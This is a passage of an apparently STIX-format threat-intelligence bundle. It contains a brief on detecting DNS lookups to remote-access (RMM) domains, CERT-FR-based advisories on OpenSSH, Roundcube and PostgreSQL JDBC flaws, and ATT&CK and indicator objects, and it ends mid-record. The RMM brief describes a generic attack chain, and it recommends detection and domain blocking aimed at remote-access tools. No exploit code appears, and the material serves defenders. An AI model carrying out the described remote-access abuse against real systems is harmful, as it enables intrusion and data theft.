      "description": "## Overview\n\nThis threat brief focuses on the detection of suspicious DNS queries directed towards domains associated with Remote Monitoring and Management (RMM) and remote access software. Threat actors frequently exploit legitimate RMM tools for various malicious purposes, including establishing command and control (C2), maintaining persistence within compromised environments, and facilitating lateral movement. The detection rule specifically targets DNS queries made by non-browser processes, aiming to surface activity from unapproved RMM clients, malicious scripts, or other unexpected software attempting to contact these services. This approach helps defenders identify unauthorized remote access, which could indicate a compromise, or the illicit use of legitimate tools for adversary operations, enabling timely response and mitigation.\n\n## Attack Chain\n\n1.  **Initial Access**: A user falls victim to a phishing email or exploits an internet-facing vulnerability, allowing an attacker to gain an initial foothold on a system.\n2.  **Execution \u0026 Staging**: Malicious code is executed, often disguised as a legitimate application or utility, which may download further tools or scripts.\n3.  **RMM Tool Deployment**: The attacker deploys a legitimate, but often unauthorized or cracked, RMM or remote access client on the compromised system. This could be done through direct installation or by leveraging existing system capabilities.\n4.  **Command and Control (C2) Initialization**: The newly deployed RMM client attempts to establish a connection to its control server, which involves performing DNS queries to its service domains (e.g., `teamviewer.com`, `anydesk.com`, `connectwise.com`).\n5.  **Persistent Remote Access**: Successful connection to the RMM domain provides the attacker with persistent remote access to the compromised system, often bypassing traditional firewall rules due to the nature of RMM applications.\n6.  **Internal Reconnaissance \u0026 Lateral Movement**: Using the RMM tool, the attacker conducts internal reconnaissance, maps the network, and moves laterally to other systems within the environment.\n7.  **Objective Achievement**: The attacker executes their final objectives, which may include data exfiltration, deployment of ransomware, or further propagation of malware.\n\n## Impact\n\nThe abuse of RMM tools by threat actors can lead to severe organizational impact. Successful exploitation can result in unauthorized, persistent access to critical systems, enabling extensive data exfiltration of sensitive information, deployment of ransomware causing significant operational disruption and financial losses, or complete network compromise. Organizations across all sectors, particularly those relying on legitimate RMM for IT support, are susceptible. If the attack succeeds, it can undermine an organization's security posture, lead to regulatory non-compliance, and damage reputation.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule (or its ESQL equivalent) to your SIEM/endpoint security platform and tune for your environment to detect suspicious DNS queries.\n*   Ensure that DNS query logging is enabled for all Windows endpoints, ideally via Sysmon Event ID 22 or Elastic Defend, to provide the necessary telemetry for the detection rule.\n*   Investigate all alerts generated by the `Detect DNS Query to Remote Monitoring/Management (RMM) Domain from Non-Browser Process` rule, focusing on the `process.executable` and its parent process.\n*   Review the code signatures (`process.code_signature`) of flagged processes to verify legitimacy and prevent abuse of trojanized RMM installers.\n*   Block the RMM domains listed in the IOC table at the DNS resolver and firewall levels for any systems not explicitly authorized to use such tools.\n*   Implement and enforce a strict policy for approved RMM tools and publishers, ensuring only authorized staff use managed, legitimate software for remote support.\n",
      "published": "2026-07-06T14:01:27Z",
      "labels": [
        "windows",
        "command-and-control",
        "endpoint",
        "rmm",
        "remote-access"
      ],
      "object_refs": [
        "indicator--76dd948a-62a9-5bd9-b165-5ec967d768c6",
        "indicator--ea7be5e9-ea48-5575-9576-6443317e3557",
        "indicator--40aaabb4-98d3-5df5-ad92-7e41fa51b545",
        "indicator--333d16a5-d017-5285-948f-f71abd25029f",
        "indicator--bf1d8216-0b18-5cc6-9196-eb6702bcc178",
        "indicator--60bd7e9a-18f9-5711-90c0-3e3a33dd68b7",
        "indicator--c3fa8089-9f16-5aa9-96e1-6dd80c8d9642",
        "indicator--61e961fd-c03a-5e15-b691-8072ea3b7627",
        "indicator--aebc86c3-b05c-592c-bb1d-85eed7d02f38",
        "indicator--cc5d7e46-49f8-5b16-a07b-8cb44870d54b",
        "indicator--17b47cfb-a740-55da-91d5-de617fd13769",
        "indicator--89d698a5-f9b7-50bb-8e35-74eb640b0b0f",
        "indicator--125faac3-e311-5884-9ca1-bcc798dc374f",
        "indicator--db5b6b9e-5cb9-5210-8f8b-bd78eca32556",
        "indicator--dc1f5f9a-a0ec-5ae1-8c58-4616a3ff36e9",
        "indicator--3050131c-0594-5f9c-9bde-43ef8d0d464b",
        "indicator--e47b4cd5-97a7-5647-b1dc-37d6e54e980c",
        "indicator--671ba783-4f37-54a5-82d4-6cd79cb252d0",
        "indicator--2830f2c3-200c-57b7-8bec-c21d16d62887",
        "indicator--a8fec858-1fc6-5659-8b58-02452994435b",
        "indicator--759fcd01-52dd-5ab1-85c1-4874c1be3cbe",
        "indicator--27168279-6bfb-53f7-a08e-648e7f519a01",
        "indicator--a6d2ad6f-8583-50c8-b354-f481ed047afa",
        "indicator--4ae64797-22b9-564a-b4e8-d240d11dfa8b",
        "indicator--a769ecb7-f0c2-505a-9712-f5652a853013",
        "indicator--92c9348e-38da-5dd7-9fe2-b5f90c1adf30",
        "indicator--49019cd7-53fe-57f5-aa38-b061135c54b8",
        "indicator--410e699d-4b4c-5a10-a479-35cb38126851",
        "indicator--da788ad3-f823-593c-ac23-990c52fac85d",
        "indicator--e4b07984-eb6e-5107-9463-7febc2c1dec2",
        "indicator--70a62f36-85f1-5e9e-a59e-6f431544cf9d",
        "indicator--5d301636-72a4-5830-877b-28d8f2a1e18e",
        "indicator--cd115ff1-2154-5453-a1b8-181d60cd5698",
        "indicator--b990f601-10cf-5d26-8533-ed4bdbf77501",
        "indicator--3f7506c4-9f16-5206-89a0-34b4bb229f5c",
        "indicator--1be71b15-96c6-51fe-a004-e7663b3f8d3c",
        "indicator--1cb691f9-29d8-58bf-a804-c0adedf8e67f",
        "indicator--5ef4a05f-58c2-5b60-8edc-67c6e4577a4b",
        "indicator--c45cc181-449b-5510-8e8a-a0ebfaa1cd76",
        "indicator--39126ad5-221a-53a7-adf5-2c15a8345c5b",
        "indicator--2d5884be-0b32-5068-bdf1-4bf16a318453",
        "indicator--fa43ff61-b79c-565b-b029-e395e7f2a120",
        "indicator--26667c81-ddfb-534f-9652-61a857f412ab",
        "indicator--7bda866e-ef96-58f3-8d10-cceedd376b49",
        "indicator--988c2859-4a55-51c0-9d49-b69d753dfefb",
        "indicator--0f7caf82-d69c-576e-a243-cefbc9b5fd71",
        "indicator--992d8326-c54c-544d-8b33-111a838c2f33",
        "indicator--c356857e-f292-5159-9e63-149f01cba679",
        "indicator--94914d66-6190-5e4e-a5a3-33fb14ff55cc",
        "indicator--52ff0ca9-7ac6-53da-b0eb-3db4c55ec115",
        "indicator--8a349222-2c30-5183-a5b1-9e6807674192",
        "indicator--e333a0ad-ea01-5dac-952a-aa9fc530de64",
        "indicator--3247e01d-ad8f-5a8f-ba2d-1c037f4f46b1",
        "indicator--39253b5e-73e1-50ac-bd1e-2e66da9b8ab4",
        "indicator--843d801d-a956-5985-a450-dc1494c13aaf",
        "indicator--f2acfd9a-473a-5024-94b5-fcd6e3e1fae5",
        "indicator--d20d8fd3-ed4c-5806-bd0a-226d3228a233",
        "indicator--befb26b2-947e-5e56-9ee5-b6532e6989a3",
        "indicator--6dbf6866-def7-573d-8277-f7fcd8929ee1",
        "indicator--bdbb12d9-eb09-5899-8f56-2b11b22860af",
        "indicator--0d582a86-487d-5847-bea9-d4cad443d2bc",
        "indicator--96b8df9f-e5b2-533b-ade8-521fd5e1cb42",
        "indicator--87897e50-1c2b-5cae-9c51-4bbf18bffadf",
        "indicator--a9b1c322-c8c8-5678-89f9-14e2f46dbc87",
        "indicator--09379a8d-2bc5-5d83-b9db-a833a085a0d1",
        "indicator--fb8af97c-fc6f-518a-9afa-75e5b3614f3a",
        "indicator--ab40cfbb-0673-5066-9014-ee269e403ea2",
        "indicator--216dc0ca-ddd2-5864-bf72-752135164e4a",
        "indicator--fea360fb-8915-5145-ad22-5e30d6b17015",
        "indicator--d7d562fa-044a-5a2b-97cb-946886cb3c24",
        "indicator--e7151dc7-33a2-5339-a7e8-b213993abd8b",
        "indicator--337ccd55-3cda-5d77-adb4-8df21a17c9d8",
        "indicator--1324be77-88fc-5977-b7f0-4a076070d5f7",
        "indicator--0f36a06f-5558-50d3-8bb6-92760705ec03",
        "indicator--e1a1ca64-500c-5f1d-939f-e5ebf160d3ee",
        "indicator--4d1484cc-33ca-599e-8629-5fc4790771b7",
        "indicator--41aff6af-4a4a-591f-bdbd-035baa3bb75f",
        "indicator--c86a4f04-da08-5e0c-b9b1-0c8f7dea4682",
        "indicator--a2c883fa-429b-5fc2-bce5-c2f902e93d48",
        "indicator--82ef1e1f-5b91-585a-a482-6a43ff2be619",
        "indicator--9ded4283-1369-553b-906e-d294906b965b",
        "indicator--d54af651-0f72-5990-9b51-06fcde32ae07",
        "indicator--4a100cde-0785-5281-a204-a3affb082a87",
        "indicator--8ffc4ce4-c4b1-5424-a2da-80d71becd189",
        "indicator--9c9ecf73-007a-5f5a-8a87-6b0446e18e3c",
        "indicator--1eb83dd1-1952-5d35-ac5d-c740be3d758b",
        "indicator--9dd1bada-19fb-56f5-ab21-daffa4ab14a9",
        "indicator--f285062f-5e2e-5856-ae83-108e5983d10a",
        "indicator--a4b16029-8c34-5857-a9f9-919ca2f1bb3b",
        "indicator--acef0f62-152a-58b0-8130-44fd9c521bb3",
        "indicator--f7e2eafd-8c2a-5073-97f7-28137361f8bd",
        "indicator--0be78899-1c52-50e9-b348-034acc3ab264",
        "indicator--a5d165de-4065-52bd-97e4-ce7d2c9fd32a",
        "indicator--aa831bcc-f22f-5580-a39d-cb0682f66a1c",
        "indicator--46bf1565-1ef2-5b42-8d2d-56b0589ddf10",
        "indicator--f6a5ece1-28d6-5426-bbd5-d4084621105d",
        "indicator--019dacf8-c8e3-525e-82b9-a59020ca51b7",
        "indicator--24a80700-7c3e-5909-b077-e510495d679f",
        "indicator--a1d58931-e853-5270-9f02-5d9d726f613f",
        "indicator--1ae91d79-8dcf-5f72-8317-a1769acbb9c9",
        "indicator--22d3559c-be14-515b-bc86-267c764b7af7",
        "indicator--a8ef55dc-79d1-589c-a4f9-d139f13bb926",
        "indicator--fd0e96cb-1d43-5be2-845d-68992464fc38",
        "indicator--48b876b6-5cdc-54de-93c1-429f1befae54",
        "indicator--a18cc4c2-6a6d-5190-a71a-b3d963d41703",
        "indicator--8b4ada23-7fb0-5602-9f78-2f2b0137334d",
        "indicator--6e98b863-4a4d-5ade-8f8a-73ec9b5a20b5",
        "indicator--fdf88142-5930-526d-9c4d-25ad2197599b",
        "indicator--d28edf2c-e2ba-5191-8dc4-5b3e6563865a",
        "indicator--0e322e9e-ac39-5eb8-9995-30727b065616",
        "indicator--5e53a780-206c-5435-8cc5-716d7c50854e",
        "indicator--76b098cd-a8c8-5b4f-be9c-6488f16ae65f",
        "indicator--19394f33-f4b9-5a2b-b86c-288866f0e01f",
        "indicator--7d8b56e9-67d7-5b7e-a240-2f601955c122",
        "indicator--07b76699-abbb-53fb-b8a4-da0872f8e186",
        "indicator--960976be-c55b-5605-b6a2-b30ca4c76e10",
        "indicator--cbd4b323-7c98-5178-9d31-8c948787412c",
        "indicator--0781ec49-93b8-50c2-85a8-0d8501d65ee5",
        "indicator--6f8d1449-d533-5615-82b6-dd72aa4a276b",
        "indicator--f3b17251-2dd0-5f7d-b95c-bf2584fb5d9c",
        "indicator--faccd797-e084-5654-b84e-ded125ab80cf",
        "indicator--ef2583ee-db4a-5437-92d9-266d632c0f0b",
        "indicator--1eef8ad9-d9ae-56be-9b77-29f33ce5aa2a",
        "indicator--f7c04296-c54c-5e6f-b084-b69e5b76af7a",
        "indicator--d1adc7d0-5caf-5b3c-80f1-f2219c67b6e9",
        "indicator--4b056394-f4c8-5d6a-8cf4-6fa82c80a626",
        "indicator--cbf318a2-090e-5360-970e-b3e0a3f9ba17",
        "indicator--be303d9a-0621-578a-a013-75d4abd17f20",
        "indicator--7abe279c-bd97-5fc7-98c4-35d0b4705d5a",
        "indicator--6fa74d74-df87-5db3-9d7e-7cfeedd04677",
        "indicator--c82b01f8-69dd-5607-aae5-83137492b9c1",
        "indicator--9572c660-f5d6-56a9-a19e-e111f2e35602",
        "indicator--0e078407-c041-5a9d-ac69-04030d0a890f",
        "indicator--cac3950b-4c9e-5672-b8ae-aef143a71551",
        "indicator--c0b8f512-2972-5ae9-b8ed-b4f9c70abc54",
        "indicator--352c2fb9-cddc-57a1-828b-a61eaf58d99a",
        "indicator--3bc7f418-2a37-5aeb-8de7-38ddc75cce80",
        "indicator--6b5210bc-3866-5071-8fe0-fc781b8e83fd",
        "indicator--6094a6a7-710e-5627-8736-52c37e17717f",
        "indicator--79e517b5-fcd2-53df-a85d-354277f7578e",
        "indicator--ddbdb8d8-63ac-51cc-833b-480bc248ba86",
        "indicator--f1da3b24-7472-5158-a8ad-c11e83d35d68",
        "indicator--74b56964-999f-5bbc-939a-4c6d2d92ba3d",
        "indicator--57066203-f015-5890-982b-780a1b8a87f9",
        "indicator--70721f6f-75ad-5826-a612-ddba745f25e2",
        "indicator--8f661d70-6ff7-54a1-8c37-609dfcd30ffd",
        "indicator--516e6530-9e67-5a5c-89fa-a7a816c55b75",
        "indicator--21b74013-442e-5a85-b87a-3da987bf9e7a",
        "indicator--67cde76b-f65b-558d-925c-3fed3373318e",
        "indicator--ee075266-c026-506e-ae5b-437911218e6c",
        "indicator--8e145538-4aa5-532a-9941-ad5901ec8695",
        "indicator--262b9e42-f18e-5349-b2d2-c2453ce7adfd",
        "indicator--a0fa549d-45bb-5e2c-a292-cc7298ea517d",
        "indicator--2152278c-5b08-53ea-8116-cc29ee386c90",
        "indicator--ec5dda66-2617-5605-8ac0-b53fcd9e20ea",
        "indicator--2be5b56d-ca69-5fa4-97d3-1ba951708352",
        "indicator--ee392c4c-540f-5794-91fd-98805f4c00c4",
        "indicator--4b46ca57-4c99-5d90-b76e-90409a020fc8",
        "indicator--31651e16-46dd-510a-8a8a-8ea5c8f4468e",
        "indicator--c3f2959b-4e7f-5850-bbf2-68da48e83caf",
        "indicator--a9bdac41-1cb8-53fa-bccc-e1c706921120",
        "indicator--148efc23-a83c-5800-94ee-9b1d24814528",
        "indicator--ef5c5860-fe09-515d-9a89-b65d7b763216",
        "indicator--d8a2ed8f-7c8d-51aa-931d-72ac152ba9dc",
        "indicator--d06a2c1a-c4dd-5d89-978b-9b732d585c1b",
        "indicator--6719ec6a-32dd-5d92-b2ad-e80985dd0e47",
        "indicator--657d8b80-52b0-5682-a1c4-eb9e2cdd57ff",
        "indicator--f526e308-f5d5-5e26-8499-96c0efabfbd1",
        "indicator--9605fe63-22b3-59e2-9eb4-7068656c48eb",
        "indicator--239b9d7b-a330-587c-8633-6f818b9956d5",
        "indicator--e6aa9970-fe5d-5dbc-a4fc-1cc449debe4d",
        "indicator--a1ca749a-f6fd-5541-9e88-85ddeb10dfb1",
        "indicator--bb46d4f9-008d-54f9-be03-fc65c78ea4f8",
        "indicator--3224b120-c8b9-590c-8a47-c05afb17ba13",
        "indicator--6259fb22-d586-5cf0-909e-3383cd448a9d",
        "indicator--dcea2b75-d423-5b16-8e98-dc54a2df8c89",
        "indicator--4838dd9f-9b36-5357-ae36-1adea1d139f9",
        "indicator--a18d87ef-cf89-5821-b2e1-74e9924585cb",
        "indicator--0a535522-c7d4-5c37-80de-bccf6437998d",
        "indicator--bda66753-13cd-5496-b5c0-225db94b1438",
        "indicator--c0219a83-cdcc-5192-8d92-2c8f43fd895d",
        "indicator--fb4bd209-1dc0-5c56-82df-24b6187e7bba",
        "indicator--c843de06-7a3a-50b2-b660-ce44bf606759",
        "indicator--6d27ddfd-afe1-5323-8b63-7f23557ccded",
        "indicator--0f6f4d2f-c42a-5332-a966-cc5e4343b67f",
        "indicator--171a8348-cdf9-58b6-b08d-1ce56b4ad12f",
        "indicator--ad957e21-5f35-59fc-bbdd-d0e78b3157b6",
        "indicator--dbe4be87-5da3-5d17-bd8f-167ed51fd519",
        "indicator--e05eb3e2-457d-5fe8-8ddf-2df4d59f117b",
        "indicator--d5a91426-a08c-5c72-be3f-abd66f11139d",
        "indicator--669cb6b4-bafa-55c2-89a0-53a68918ccd0",
        "indicator--656f542a-4c92-5ec1-971c-9c23904dfae9",
        "indicator--8e6028ba-cc13-5264-8fce-0a0940a9f826"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_dns_rmm_domains_non_browser.toml"
        },
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1219/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a"
        },
        {
          "source_name": "reference",
          "url": "https://lolrmm.io/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--06670a94-a827-5afd-8e29-8c2f98dc23ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8b83cc42-5199-539c-b251-b17f8dd0ece5",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f4bf6f5d-06b4-5100-ae73-fdd5b032e6dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8b83cc42-5199-539c-b251-b17f8dd0ece5",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8b83cc42-5199-539c-b251-b17f8dd0ece5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiples vulnérabilités dans OpenSSH",
      "description": "## Overview\n\nCERT-FR has disclosed multiple unpatched vulnerabilities impacting OpenSSH versions prior to 10.4, with the advisory published on July 6, 2026. These vulnerabilities pose significant risks, including the potential for security policy bypass, denial of service (DoS) attacks, and other unspecified security concerns. Attackers could leverage these flaws to gain unauthorized access, disrupt critical services, or compromise the integrity of affected systems. While the specific methods of exploitation are not detailed, the broad nature of the impacts underscores the urgency for immediate remediation. Given OpenSSH's widespread use as a foundational secure communication protocol, any unpatched vulnerability presents a critical attack surface for adversaries across various sectors. Organizations must prioritize patching to mitigate potential exposure.\n\n## Attack Chain\n\nThis advisory describes multiple vulnerabilities without providing specific, documented attack chain steps or observed exploitation scenarios. Therefore, a detailed attack chain cannot be constructed based on the provided information.\n\n## Impact\n\nThe identified vulnerabilities in OpenSSH versions earlier than 10.4 could lead to severe consequences for affected organizations. Successful exploitation may result in a complete bypass of security policies, allowing attackers to perform unauthorized actions or access sensitive data. Furthermore, the denial of service vulnerability could render critical SSH services unavailable, severely impacting operational continuity and business processes. While specific victim counts or targeted sectors are not detailed in this advisory, the pervasive deployment of OpenSSH across enterprise and critical infrastructure environments means the potential impact is broad and could affect any organization relying on the software for secure remote access and file transfer.\n\n## Recommendation\n\n*   Immediately update all OpenSSH installations to version 10.4 or later, as referenced in the OpenSSH security bulletin `https://www.openssh.com/txt/release-10.4`.\n*   Refer to the \"Documentation\" section of the CERT-FR advisory at `https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0836/` and the OpenSSH security bulletin for detailed patching instructions specific to your distribution.\n",
      "published": "2026-07-06T13:53:35Z",
      "labels": [
        "vulnerability",
        "openssh",
        "network"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0836/"
        },
        {
          "source_name": "reference",
          "url": "https://www.openssh.com/txt/release-10.4"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f5e80e13-69f1-54f4-96c9-f50aac0115ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Roundcube Webmail (CVE-2026-54432, CVE-2026-54433)",
      "description": "## Overview\n\nThe CERT-FR has published an advisory regarding multiple vulnerabilities, specifically CVE-2026-54432 and CVE-2026-54433, in Roundcube Webmail versions 1.6.x prior to 1.6.17 and 1.7.x prior to 1.7.2. These vulnerabilities, announced on July 6, 2026, by CERT-FR (with Roundcube's security bulletin dated July 5, 2026), could allow a remote attacker to trigger a denial of service, perform Server-Side Request Forgery (SSRF), and inject indirect remote code (XSS). The advisory highlights the necessity for users to apply security updates to prevent potential compromise of their webmail instances and maintain the integrity and availability of their communications.\n\n## Attack Chain\n\n[The source does not provide specific attack chain details or observed exploitation steps beyond describing the types of vulnerabilities. Therefore, a detailed attack chain cannot be constructed.]\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities (CVE-2026-54432, CVE-2026-54433) in affected Roundcube Webmail instances could lead to various detrimental outcomes. An attacker could trigger a denial of service, rendering the webmail service unavailable to legitimate users. The Server-Side Request Forgery (SSRF) vulnerability could allow an attacker to coerce the webmail server into making requests to internal or external systems on their behalf, potentially exposing sensitive information from internal network resources or enabling further network pivot points. Additionally, the Cross-Site Scripting (XSS) vulnerability could be used to execute malicious scripts in a user's browser, enabling actions such as session hijacking, defacement of the web interface, or credential theft. The exact number of victims is not specified, but any organization using vulnerable versions of Roundcube Webmail is at risk.\n\n## Recommendation\n\n*   Immediately apply the security updates for Roundcube Webmail, upgrading to version 1.6.17 or later for the 1.6.x branch, or version 1.7.2 or later for the 1.7.x branch, as detailed in the Roundcube security bulletin referenced in this brief.\n*   Review the details of CVE-2026-54432 and CVE-2026-54433 to understand the specific risks posed by these vulnerabilities.\n*   Ensure that all public-facing web applications are regularly patched and monitored for signs of compromise.\n",
      "published": "2026-07-06T13:52:44Z",
      "labels": [
        "webmail",
        "vulnerability",
        "ssrf",
        "xss",
        "dos",
        "web-application"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0835/"
        },
        {
          "source_name": "reference",
          "url": "https://roundcube.net/news/2026/07/05/security-updates-1.6.17-and-1.7.2"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54432"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54433"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1b8bfc1c-ccec-50ca-bd9a-bca411f174a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.postgresql.org/about/news/postgresql-jdbc-42712-security-release-3340/",
      "pattern": "[url:value = 'https://www.postgresql.org/about/news/postgresql-jdbc-42712-security-release-3340/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:51:49Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b0ffa0ce-5cbf-5442-bc27-2ca587e385d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f0ea4803-fb0a-54b4-b546-2ac6865a7700",
      "target_ref": "indicator--1b8bfc1c-ccec-50ca-bd9a-bca411f174a8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b7a0c59e-ffad-5b59-b506-5c70aa8d4d85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-54291",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-54291']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:51:49Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1275f09c-320b-521d-9e2d-e9ca60b56f72",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f0ea4803-fb0a-54b4-b546-2ac6865a7700",
      "target_ref": "indicator--b7a0c59e-ffad-5b59-b506-5c70aa8d4d85"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f0ea4803-fb0a-54b4-b546-2ac6865a7700",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Vulnerability in PostgreSQL JDBC Allows Security Policy Bypass (CVE-2026-54291)",
      "description": "## Overview\n\nOn July 6, 2026, the French National Agency for the Security of Information Systems (ANSSI) CERT-FR issued an advisory (CERTFR-2026-AVI-0837) regarding a critical vulnerability, CVE-2026-54291, impacting PostgreSQL JDBC driver versions. This flaw affects all versions from 42.7.4 up to, but not including, 42.7.12. The vulnerability enables an attacker to circumvent security policies implemented within applications that rely on the affected PostgreSQL JDBC driver. While specific exploitation details are not provided in the advisory, a successful bypass of security policies could lead to unauthorized data access, privilege escalation, or other detrimental actions, making it crucial for defenders to promptly address this issue to protect their systems.\n\n## Impact\n\nThe vulnerability, CVE-2026-54291, allows for a security policy bypass, which could have significant consequences for organizations utilizing affected PostgreSQL JDBC versions. While the advisory does not detail specific observed attacks or victim numbers, a successful exploitation could compromise the confidentiality, integrity, or availability of data managed by applications connecting to PostgreSQL databases. Any application relying on the vulnerable JDBC driver is at risk, potentially impacting a wide range of sectors from financial services to critical infrastructure, where PostgreSQL databases are commonly deployed. The ultimate damage depends on the specific security policies bypassed and the nature of the data and operations managed by the vulnerable application.\n\n## Recommendation\n\n*   Immediately review your application environments to identify all instances of PostgreSQL JDBC and determine if any are running versions 42.7.4 through 42.7.11.\n*   Apply the security patch by upgrading PostgreSQL JDBC to version 42.7.12 or newer, as described in the [PostgreSQL security bulletin](https://www.postgresql.org/about/news/postgresql-jdbc-42712-security-release-3340/) for CVE-2026-54291.\n",
      "published": "2026-07-06T13:51:49Z",
      "labels": [
        "vulnerability",
        "jdbc",
        "postgresql",
        "security-bypass",
        "cve"
      ],
      "object_refs": [
        "indicator--1b8bfc1c-ccec-50ca-bd9a-bca411f174a8",
        "indicator--b7a0c59e-ffad-5b59-b506-5c70aa8d4d85"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0837/"
        },
        {
          "source_name": "reference",
          "url": "https://www.postgresql.org/about/news/postgresql-jdbc-42712-security-release-3340/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54291"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--11debd2f-97c3-5ec0-b192-db7c3971db0a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2870c253-2518-5d54-b2c0-f26a0997ec8d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--059a09ed-0b39-5a29-94a6-d31718fa1044",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2870c253-2518-5d54-b2c0-f26a0997ec8d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1505",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f12993cf-e25f-5456-b791-077966ac5e18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2870c253-2518-5d54-b2c0-f26a0997ec8d",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2870c253-2518-5d54-b2c0-f26a0997ec8d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "JoomShaper SP LMS PHP Object Injection Leads to RCE (CVE-2026-48909)",
